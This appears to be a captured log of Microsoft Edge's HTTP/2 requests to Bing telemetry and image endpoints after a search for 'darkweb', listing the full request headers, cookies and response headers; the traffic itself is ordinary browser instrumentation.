GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 15999
content-type: text/html; charset=utf-8
cache-control: private
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a3cf07648e49c0e8754e12ba2c0
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-iMcdwcswLJ7k2z91h2rhTNjOUNV38z44Pw0I8gBTLCA='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:09:00 GMT
set-cookie: bm_sv=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: bm_sv=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306940.7f1e377
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%227%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%227%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306940.7f1e391
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306940.7f1e392
GET

https://www.bing.com/images/sbi?mmasync=1&ig=202035EC43B64C3DBF7FE10F53408EC5&iid=.5097&ptn=Web&ep=0&iconpl=1

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /images/sbi?mmasync=1&ig=202035EC43B64C3DBF7FE10F53408EC5&iid=.5097&ptn=Web&ep=0&iconpl=1 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 772
content-type: text/html; charset=utf-8
cache-control: no-cache, no-store, must-revalidate
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67502a3c79b24b30a963922569263526
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-UQXl+M/FIM1QTnQRWWVCAPLmQZjJHn+G8LVnU6h0OzI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-ceto-ref: 67502a3c79b24b30a963922569263526|AFD:67502a3c79b24b30a963922569263526|2024-12-04T10:09:00.707Z
date: Wed, 04 Dec 2024 10:09:00 GMT
set-cookie: _C_ETH=1; domain=.bing.com; path=/; secure; httponly
set-cookie: _C_Auth=
set-cookie: bm_sv=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: bm_sv=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306940.7f1e393
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931244%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931245%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931249%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22Time%22%3A1275%2C%22time%22%3A1278%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1733306931651%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931244%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931245%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931249%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22Time%22%3A1275%2C%22time%22%3A1278%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1733306931651%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 997
content-type: text/html; charset=utf-8
cache-control: no-cache
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67502a3c25514760a59b80da438b831a
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
